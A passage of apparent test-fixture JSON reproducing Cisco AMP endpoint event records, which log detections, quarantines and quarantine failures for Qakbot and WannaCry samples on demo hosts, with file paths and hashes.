+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 